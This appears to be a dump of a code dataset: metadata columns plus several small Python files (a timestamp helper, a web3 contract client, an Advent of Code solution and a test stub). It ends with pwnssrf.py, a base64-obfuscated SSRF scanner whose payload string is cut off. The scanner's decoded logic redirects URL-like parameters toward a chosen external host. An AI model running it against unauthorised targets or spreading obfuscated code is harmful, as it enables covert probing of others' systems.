hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
843cd21c1958096f67e66defea105ecdd4a5d7e5
| 79
|
py
|
Python
|
utils.py
|
mouseMD/xo_server
|
4c35c713483639c79726a10b5f61c13799f623ac
|
[
"MIT"
] | null | null | null |
utils.py
|
mouseMD/xo_server
|
4c35c713483639c79726a10b5f61c13799f623ac
|
[
"MIT"
] | 2
|
2021-01-01T16:32:42.000Z
|
2021-01-09T16:23:10.000Z
|
utils.py
|
mouseMD/xo_server
|
4c35c713483639c79726a10b5f61c13799f623ac
|
[
"MIT"
] | null | null | null |
from time import time
def current_timestamp() -> int:
return int(time())
| 13.166667
| 31
| 0.683544
| 11
| 79
| 4.818182
| 0.727273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.202532
| 79
| 5
| 32
| 15.8
| 0.84127
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
ffe4a0728dec2205677e5b2160792a51fa038ff2
| 3,098
|
py
|
Python
|
client.py
|
qianfei11/InfoContract
|
2e1de04ac92dab42f53d4b1474ceee1b7ebe6783
|
[
"Apache-2.0"
] | null | null | null |
client.py
|
qianfei11/InfoContract
|
2e1de04ac92dab42f53d4b1474ceee1b7ebe6783
|
[
"Apache-2.0"
] | null | null | null |
client.py
|
qianfei11/InfoContract
|
2e1de04ac92dab42f53d4b1474ceee1b7ebe6783
|
[
"Apache-2.0"
] | null | null | null |
from web3 import Web3
w3 = Web3(Web3.HTTPProvider("http://127.0.0.1:7545"))
if not w3.isConnected():
print('[-] Connected error!')
exit()
w3.eth.defaultAccount = w3.eth.accounts[2]
address = '0x6eAe6059E06DE916039d6027E4E674e240d5E041'
abi = '[{"anonymous":false,"inputs":[{"indexed":false,"internalType":"string","name":"fName","type":"string"},{"indexed":false,"internalType":"uint256","name":"age","type":"uint256"}],"name":"Instructor","type":"event"},{"constant":false,"inputs":[{"internalType":"string","name":"_fName","type":"string"},{"internalType":"uint256","name":"_age","type":"uint256"}],"name":"setInfo","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"getInfo","outputs":[{"internalType":"string","name":"","type":"string"},{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"}]'
bytecode = '608060405234801561001057600080fd5b506103a8806100206000396000f3fe608060405234801561001057600080fd5b50600436106100365760003560e01c80635a9b0b891461003b5780638262963b146100c2575b600080fd5b61004361016c565b6040518080602001838152602001828103825284818151815260200191508051906020019080838360005b8381101561008657818101518382015260200161006e565b50505050905090810190601f1680156100b35780820380516001836020036101000a031916815260200191505b50935050505060405180910390f35b61016a600480360360408110156100d857600080fd5b8101906020810181356401000000008111156100f357600080fd5b82018360208201111561010557600080fd5b8035906020019184600183028401116401000000008311171561012757600080fd5b91908080601f0160208091040260200160405190810160405280939291908181526020018383808284376000920191909152509295505091359250610218915050565b005b6060600080600154818054600181600116156101000203166002900480601f0160208091040260200160405190810160405280929190818152602001828054600181600116156101000203166002900480156102095780601f106101de57610100808354040283529160200191610209565b820191906000526020600020905b8154815290600101906020018083116101ec57829003601f168201915b50505050509150915091509091565b815161022b9060009060208501906102d8565b50806001819055507f010becc10ca1475887c4ec429def1ccc2e9ea1713fe8b0d4e9a1d009042f6b8e82826040518080602001838152602001828103825284818151815260200191508051906020019080838360005b83811015610299578181015183820152602001610281565b50505050905090810190601f1680156102c65780820380516001836020036101000a031916815260200191505b50935050505060405180910390a15050565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f1061031957805160ff1916838001178555610346565b82800160010185558215610346579182015b8281111561034657825182559160200191906001019061032b565b50610352929150610356565b5090565b61037091905b80821115610352576000815560010161035c565b9056fea265627a7a7231582089d2eea2ed81fdcae3e852c43c869501475a43097a5ec7fe1678ae76b87fde0c64736f6c634300050c0032'
contract = w3.eth.contract(address=address, abi=abi, bytecode=bytecode)
tx_hash = contract.functions.setInfo("assassinq", 21).transact({'from':w3.eth.defaultAccount})
info = contract.caller.getInfo()
print(info)
| 163.052632
| 1,949
| 0.88315
| 131
| 3,098
| 20.862595
| 0.442748
| 0.020124
| 0.024149
| 0.019759
| 0.069155
| 0.05708
| 0.030004
| 0
| 0
| 0
| 0
| 0.609324
| 0.016785
| 3,098
| 18
| 1,950
| 172.111111
| 0.287919
| 0
| 0
| 0
| 0
| 0.076923
| 0.87504
| 0.857604
| 0
| 1
| 0.013562
| 0
| 0
| 1
| 0
| false
| 0
| 0.076923
| 0
| 0.076923
| 0.153846
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f238b5a4c127d2ff8f9681bfa9799f05b6fd4ec6
| 25
|
py
|
Python
|
pyrf/units.py
|
thelaly/pyrf
|
52d7e8059dcd5e9dedd6a2a689124372836aae1c
|
[
"BSD-3-Clause"
] | 32
|
2015-05-30T04:48:40.000Z
|
2021-08-17T02:33:03.000Z
|
pyrf/units.py
|
thelaly/pyrf
|
52d7e8059dcd5e9dedd6a2a689124372836aae1c
|
[
"BSD-3-Clause"
] | 10
|
2015-02-04T20:51:39.000Z
|
2021-11-15T17:47:56.000Z
|
pyrf/units.py
|
thelaly/pyrf
|
52d7e8059dcd5e9dedd6a2a689124372836aae1c
|
[
"BSD-3-Clause"
] | 5
|
2015-01-28T08:36:22.000Z
|
2020-07-02T10:52:47.000Z
|
M = 10.0**6
G = 10.0**9
| 6.25
| 11
| 0.4
| 8
| 25
| 1.25
| 0.75
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.444444
| 0.28
| 25
| 3
| 12
| 8.333333
| 0.111111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f29763494d868e45a96afc1f87fd15d565721762
| 2,349
|
py
|
Python
|
day_9/first_part.py
|
mamad-azimi-jozani/advent-of-code
|
af6d6acbf492279f80dff2cecd0c3983ebf3f734
|
[
"MIT"
] | null | null | null |
day_9/first_part.py
|
mamad-azimi-jozani/advent-of-code
|
af6d6acbf492279f80dff2cecd0c3983ebf3f734
|
[
"MIT"
] | null | null | null |
day_9/first_part.py
|
mamad-azimi-jozani/advent-of-code
|
af6d6acbf492279f80dff2cecd0c3983ebf3f734
|
[
"MIT"
] | null | null | null |
import numpy as np
with open('input.txt') as f:
f = [i.strip() for i in f.readlines()]
# print(f)
zero = np.zeros((len(f), len(f[0])))
f = [list(map(int, i)) for i in f]
for i in range(len(f)):
zero[i] = f[i]
adjacent = []
for i in range(len(f)):
for j in range(len(f[0])):
# top_left
if i == 0 and j == 0:
if zero[i][j] < zero[i+1][j] and zero[i][j] < zero[i][j+1]:
adjacent.append(zero[i][j])
# down_left
if i == len(f)-1 and j == 0:
if zero[i][j] < zero[i-1][j] and zero[i][j] < zero[i][j+1]:
adjacent.append(zero[i][j]) # top_right
if i == 0 and j == len(f[0])-1:
if zero[i][j] < zero[i+1][j] and zero[i][j] < zero[i][j-1]:
adjacent.append(zero[i][j]) # down_right
if i == len(f)-1 and j == len(f[0])-1:
if zero[i][j] < zero[i-1][j] and zero[i][j] < zero[i][j-1]:
adjacent.append(zero[i][j])
# corner_column_left without last and first
if 1 <= i <= len(f)-2 and j == 0:
if zero[i][j] < zero[i-1][j] and zero[i][j] < zero[i+1][j]:
if zero[i][j] < zero[i][j+1]:
adjacent.append(zero[i][j])
# corner_column_right without last and first
if 1 <= i <= len(f)-2 and j == len(f[0])-1:
if zero[i][j] < zero[i-1][j] and zero[i][j] < zero[i+1][j]:
if zero[i][j] < zero[i][j-1]:
adjacent.append(zero[i][j])
# top_row without last and first
if i == 0 and 1 <= j <= len(f[0])-2:
if zero[i][j] < zero[i][j-1] and zero[i][j] < zero[i][j+1] and zero[i][j] < zero[i+1][j]:
adjacent.append(zero[i][j])
#down_row without last and first
if i == len(f)-1 and 1 <= j <= len(f[0])-2:
if zero[i][j] < zero[i][j-1] and zero[i][j] < zero[i][j+1]:
if zero[i][j] < zero[i-1][j]:
adjacent.append(zero[i][j])
# other
if 1 <= i <= len(f)-2 and 1 <= j <= len(f[0])-2:
if zero[i][j] < zero[i][j-1] and zero[i][j] < zero[i][j+1]:
if zero[i][j] < zero[i-1][j] and zero[i][j] < zero[i+1][j]:
adjacent.append(zero[i][j])
print(sum(adjacent)+len(adjacent))
| 23.49
| 101
| 0.447424
| 428
| 2,349
| 2.432243
| 0.098131
| 0.278578
| 0.259366
| 0.230548
| 0.81172
| 0.804035
| 0.766571
| 0.694525
| 0.694525
| 0.694525
| 0
| 0.036082
| 0.339293
| 2,349
| 99
| 102
| 23.727273
| 0.634665
| 0.085568
| 0
| 0.380952
| 0
| 0
| 0.004294
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.02381
| 0
| 0.02381
| 0.02381
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
29f118260e927d939bfb0cb943792b5ae4873818
| 42
|
py
|
Python
|
tests/examples/module_ok/__main__.py
|
q0w/slotscheck
|
ec4e8d9925d2c01cbf36aa618b665de0e919672b
|
[
"MIT"
] | 48
|
2022-01-03T11:31:02.000Z
|
2022-03-23T14:16:03.000Z
|
tests/examples/module_ok/__main__.py
|
q0w/slotscheck
|
ec4e8d9925d2c01cbf36aa618b665de0e919672b
|
[
"MIT"
] | 64
|
2022-01-03T13:07:36.000Z
|
2022-03-29T04:35:27.000Z
|
tests/examples/module_ok/__main__.py
|
q0w/slotscheck
|
ec4e8d9925d2c01cbf36aa618b665de0e919672b
|
[
"MIT"
] | 3
|
2022-01-04T18:37:43.000Z
|
2022-02-02T13:46:19.000Z
|
assert "this file should not be imported"
| 21
| 41
| 0.785714
| 7
| 42
| 4.714286
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 42
| 1
| 42
| 42
| 0.942857
| 0
| 0
| 0
| 0
| 0
| 0.761905
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d99c8a24fb711d3dbb77c59360e58ba4d7ce5619
| 23,678
|
py
|
Python
|
pwnssrf.py
|
kishorehariram/PwnSSRF
|
9bd88dcf8bbcc5abfd102e08e6459de9966824a6
|
[
"MIT"
] | 45
|
2020-09-01T01:04:46.000Z
|
2021-11-08T14:12:06.000Z
|
pwnssrf.py
|
FDlucifer/PwnSSRF
|
00baef96aaa3c188048cceceac29801afb3e5d49
|
[
"MIT"
] | null | null | null |
pwnssrf.py
|
FDlucifer/PwnSSRF
|
00baef96aaa3c188048cceceac29801afb3e5d49
|
[
"MIT"
] | 19
|
2020-09-01T08:58:19.000Z
|
2021-11-01T09:00:04.000Z
|
# Python code obfuscated by pwn0day.com
import base64, codecs
magic = 'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uMwoKaW1wb3J0IHF1ZXVlCmZyb20gdGhyZWFkaW5nIGltcG9ydCBUaHJlYWQKZnJvbSBiczQgaW1wb3J0IEJlYXV0aWZ1bFNvdXAKZnJvbSB1cmxsaWIucGFyc2UgaW1wb3J0IHVybHBhcnNlCmltcG9ydCBzeXMKaW1wb3J0IHJlCmZyb20gYXJncGFyc2UgaW1wb3J0IEFyZ3VtZW50UGFyc2VyCmltcG9ydCByZXF1ZXN0cwppbXBvcnQgYmFzZTY0LCB4bWwuZXRyZWUuRWxlbWVudFRyZWUKaW1wb3J0IHVybGxpYgppbXBvcnQganNvbgoKYmFubmVyPSIiIgrilZTilZDilZfilKwg4pSs4pSM4pSQ4pSM4pWU4pWQ4pWX4pWU4pWQ4pWX4pWm4pWQ4pWX4pWU4pWQ4pWXCuKVoOKVkOKVneKUguKUguKUguKUguKUguKUguKVmuKVkOKVl+KVmuKVkOKVl+KVoOKVpuKVneKVoOKVoyAK4pWpICDilJTilLTilJjilJjilJTilJjilZrilZDilZ3ilZrilZDilZ3ilanilZrilZDilZogIAoiIiIKCnByaW50KGJhbm5lcikKCnBhcnNlciA9IEFyZ3VtZW50UGFyc2VyKCkKcGFyc2VyLmFkZF9hcmd1bWVudCgiLUgiLCAiLS1ob3N0IiwgZGVzdD0iaG9zdCIsIG1ldGF2YXI9IkhPU1QiLCByZXF1aXJlZD1UcnVlKQpwYXJzZXIuYWRkX2FyZ3VtZW50KCItdCIsICItLXRocmVhZHMiLCBkZXN0PSJ0aHJlYWRzIiwgbWV0YXZhcj0iVEhSRUFEUyIpCnBhcnNlci5hZGRfYXJndW1lbnQoIi1jIiwiLS1jb29raWVzIiwgbmFyZ3M9JysnLCBkZXN0PSJjb29raWVzIiwgbWV0YXZhcj0iQ09PS0lFUyIpCnBhcnNlci5hZGRfYXJndW1lbnQoIi12IiwiLS12ZXJib3NlIiwgZGVzdD0idmVyYm9zZSIsIGFjdGlvbj0nc3RvcmVfdHJ1ZScpCnBhcnNlci5hZGRfYXJndW1lbnQoIi1wIiwiLS1wYXlsb2FkIiwgZGVzdD0icGF5bG9hZCIpCnBhcnNlci5hZGRfYXJndW1lbnQoIi1iIiwgIi0tYnVycCIsZGVzdD0iYnVycCIsaGVscD0icHJvdmlkZSBhIGJ1cnAgZmlsZSIsIGFjdGlvbj0ic3RvcmUiKQoKYXJncyA9IHBhcnNlci5wYXJzZV9hcmdzKCkKCnZhbGlkYXRlSG9zdF9yZWdleD0iXihodHRwOlwvXC93d3dcLnxodHRwczpcL1wvd3d3XC58aHR0cDpcL1wvfGh0dHBzOlwvXC8pW2EtejAtOV0rKFtcLVwuXXsxfVthLXowLTldKykqXC5bYS16XXsyLDV9KDpbMC05XXsxLDV9KT8oXC8uKik/JCIKdmFsaWRhdGVIb3N0SXBXaXRoUG9ydF9yZWdleD0iXmh0dHBzPzpcL1wvKChbMC05XXxbMS05XVswLTldfDFbMC05XXsyfXwyWzAtNF1bMC05XXwyNVswLTVdKVwuKXszfShbMC05XXxbMS05XVswLTldfDFbMC05XXsyfXwyWzAtNF1bMC05XXwyNVswLTVdKT86P1swLTldKyQiCgojVmFsaWRhdGluZyBIb3N0IG5hbWUKaWYgbm90KHJlLm1hdGNoKHZhbGlkYXRlSG9zdF9yZWdleCxhcmdzLmhvc3QpIG9yIHJlLm1hdGNoKHZhbGlkYXRlSG9zdElwV2l0aFBvcnRfcmVnZXgsYXJncy5ob3N0KSk6CiAgICBwcmludCAoIlRlcm1pbmF0aW5nLi4uIFBsZWFzZSBlbnRlciBIb3N0IGluIHRoZSBmb3JtYXQgaHR0cDovL2dvb2dsZS5jb20gb3IgaHR0cHM6Ly9nb29nbGUuY29tIG9yIGh0dHA6Ly8xMC4xMC4xMC4xMCBmb3IgaW50ZXJuYWwgaG9zdHMiKQogICAgc3lzLmV4aXQoKQoKaWYgYXJncy5wYXlsb2FkIGFuZCBub3QgcmUubWF0Y2godmFsaWRhdGVIb3N0X3JlZ2V4LGFyZ3MucGF5bG9hZCkgYW5kIG5vdCByZS5tYXRjaCh2YWxpZGF0ZUhvc3RJcFdpdGhQb3J0X3JlZ2V4LGFyZ3MucGF5bG9hZCk6CiAgICAgICAgcHJpbnQgKCJUZXJtaW5hdGluZy4uLiBQbGVhc2UgZW50ZXIgSG9zdCBpbiB0aGUgZm9ybWF0IGh0dHA6Ly9nb29nbGUuY29tIG9yIGh0dHA6Ly8xOTIuMTY4LjEuMTo4MCIpCiAgICAgICAgc3lzLmV4aXQoKQoKI0tlZXBzIGEgcmVjb3JkIG9mIGxpbmtzIHdoaWNoIGFyZSBhbHJlYWR5IHNhdmVkIGFuZCBhcmUgcHJlc2VudCBqdXN0IG9uY2UgaW4gdGhlIHF1ZXVlCmxpbmtzVmlzaXRlZD1zZXQoKQpzc3JmVnVsPXNldCgpCgojVGhyb3cgYXdheSBsaXN0IGp1c3QgdXNlZCBmb3IgaWdub3JpbmcgdW5uZWNlc3NhcnkgY3Jhd2xpbmcgYW5kIGdlbmVyYXRpbmcgbm9pc3kgb3V0cHV0CnRocm93QXdheUxpc3RGb3JSZXN0PXNldCgpCnRocm93QXdheUdldFJlcXM9e30KCiNJZ25vcmUgdGhlIHBhdGggd2hpY2ggd2UgY291bGRuJ3QgYmUgY3Jhd2xlZAppZ25vcmVMaXN0PVsicGRmIiwibWFpbHRvIiwiamF2YXNjcmlwdCJdCgojTGlzdCBjb250YWluaW5nIGtleXdvcmRzIHRvIGxvb2sgZm9yIGluIHBvc3QgcGFyYW0gbmFtZSBhdHRyaWJ1dGVzIGFuZCBpbiBnZXQgcGFyYW1ldGVycwptYXRjaExpc3Q9Iih1cmx8d2VifHNpdGV8dXJpKSIKCiNDb29raWVzIHRvIHNlbmQgYWxvbmcgd2l0aCBlYWNoIHJlcXVlc3RzCmNvb2tpZXNEaWN0PXt9CmlmIGFyZ3MuY29va2llczoKCWZvciBjb29rIGluIGFyZ3MuY29va2llczoKCQljb29raWVzRGljdFtjb29rWzpjb29rLmZpbmQoIj0iKV1dPWNvb2tbY29vay5maW5kKCI9IikrMTpdCgojTWFraW5nIGFuIGV4dGVybmFsIHJlcXVlc3QgdG8gYSBob3N0bmFtZSB0aHJvdWdoIHRoZSBwb3RlbnRpYWwgdnVsbmVyYWJsZSBwYXJhbWV0ZXIgdG8gdmFsaWRhdGUgU1NSRgpkZWYgbWFraW5nRXh0ZXJuYWxSZXF1ZXN0cyhwYXJhbU5hbWUsIHVybCk6CglyZWdleFRvUmVwbGFjZT1wYXJhbU5hbWUrIj0oLio/KSg/OiZ8JCkiCglwYXJhbWV0ZXJWYWx1ZXRvUmVwbGFjZT1yZS5zZWFyY2gocmVnZXhUb1JlcGxhY2UsdXJsKS5ncm91cCgxKQoKCSNBZGRpbmcgcGFyYW1uYW1lICdhcmdzLnBheWxvYWQrIi8iK3BhcmFtTmFtZSwnIGF0IHRoZSBlbmQgb2YgYnVycCBjb2xsYWJvcmF0b3IgdXJsIHRvIGRpZmZlcmVudGlhdGUgd2hpY2ggcGFyYW0gc3VjY2VlZGVkIHRvIG1ha2UgZXh0ZXJuYWwgcmVxdWVzdC4KCWZvcm1pbmdQYXlsb2FkVVJMPXJlLnN1YihwYXJhbWV0ZXJWYWx1ZXRvUmVwbGFjZSxhcmdzLnBheWxvYWQrIi8iK3BhcmFtTmFtZSx1cmwpCglwcmludCAoIlwwMzNbOTFtWytdIE1ha2luZyBleHRlcm5hbCByZXF1ZXN0IHdpdGggdGhlIHBvdGVudGlhbCB2dWxuZXJhYmxlIHVybDoiK2Zvcm1pbmdQYXlsb2FkVVJMKQoJcmVxdWVzdHMuZ2V0KGZvcm1pbmdQYXlsb2FkVVJMKQoKI1RoaXMgY2hlY2tzIGFnYWluc3QgVVJMIGtleXdvcmRzIGluIHBhcmFtIE5BTUUKZGVmIG1hdGNoVVJMS2V5d29yZHNJbk5hbWUoZ2V0T3JGb3JtLHBhcmFtTmFtZSx1cmwpOgoJaWYgYXJncy52ZXJib3NlOgoJCXRlbXA9dXJsKyI6cGFyYW1uYW1lOiIrcGFyYW1OYW1lCgllbHNlOgoJCXRlbXA9cGFyYW1OYW1lCglpZiB0ZW1wIG5vdCBpbiBzc3JmVnVsIGFuZCByZS5zZWFyY2gobWF0Y2hMaXN0LHBhcmFtTmFtZSxyZS5JKToKCQlwcmludCAoIlwwMzNbOTJtWy1dIFBvdGVudGlhbCB2dWxuZXJhYmxlICd7fScgcGFyYW1ldGVyIHt9ICd7fScgYXQgJ3t9JyIuZm9ybWF0KGdldE9yRm9ybSwiTmFtZSIscGFyYW1OYW1lLHVybCkpCgkJc3NyZlZ1bC5hZGQodGVtcCkKCQkjVHJ5aW5nIHRvIG1ha2UgYW4gZXh0ZXJuYWwgcmVxdWVzdCB0byB2YWxpZGF0ZSBwb3RlbnRpYWwgU1NSRiAoT25seSBmb3IgR0VUIHBhcmFtZXRlciBmb3Igbm93KSAJCgkJaWYgYXJncy5wYXlsb2FkIGFuZCBnZXRPckZvcm0gPT0gIkdFVCI6CgkJCW1ha2luZ0V4dGVybmFsUmVxdWVzdHMocGFyYW1OYW1lLHVybCkKCiNUaGlzIGNoZWNrcyBVUkwgcGF0dGVybiBpbiBwYXJhbSBWQUxVRSBhbmQgYWxzbyBpZiBhbiBJUCBpcyBwYXNzZWQgc29tZXdoZXJlIGluIHRoZSB2YWx1ZXMKZGVmIG1hdGNoVVJMUGF0dGVybkluVmFsdWUoZ2V0T3JGb3JtLCBwYXJhbU5hbWUscGFyYW1WYWx1ZXMsdXJsKToKCSNTaW5jZSBhbGwgZmllbGRzIGRpZG4ndCBoYXZlIHBhcmFtTmFtZXMgaGVuY2UgdGhpcyBjb25kaXRpb24KCWlmIGFyZ3MudmVyYm9zZToKCQl0ZW1wPXVybCsiOnBhcmFtbmFtZToiK3BhcmFtVmFsdWVzIGlmIHBhcmFtTmFtZT09IiIgZWxzZSB1cmwrIjpwYXJhbW5hbWU6IitwYXJhbU5hbWUKCWVsc2U6CgkJdGVtcD1wYXJhbVZhbHVlcyBpZiBwYXJhbU5hbWU9PSIiIGVsc2UgcGFyYW1OYW1lCiAgICAgICAgICAgICAgICAKCWlmIHRlbXAgbm90IGluIHNzcmZWdWwgYW5kIChyZS5tYXRjaCgiXihodHRwOlwvXC93d3dcLnxodHRwczpcL1wvd3d3XC58aHR0cDpcL1wvfGh0dHBzOlwvXC8pP1thLXowLTldKyhbXC1cLl17MX1bYS16MC05XSspKlwuW2Etel17Miw1fSg6WzAtOV17MSw1fSk/KFwvLiopPyQiLHBhcmFtVmFsdWVzKSBvciByZS5tYXRjaCgiKCgyNVswLTVdfDJbMC00XVswLTldfFswMV0/WzAtOV1bMC05XT8pKFwufCQpKXs0fSIscGFyYW1WYWx1ZXMpKToKCQlwcmludCAoIlwwMzNbOTJtWy1dIFBvdGVudGlhbCB2dWxuZXJhYmxlICd7fScgcGFyYW1ldG'
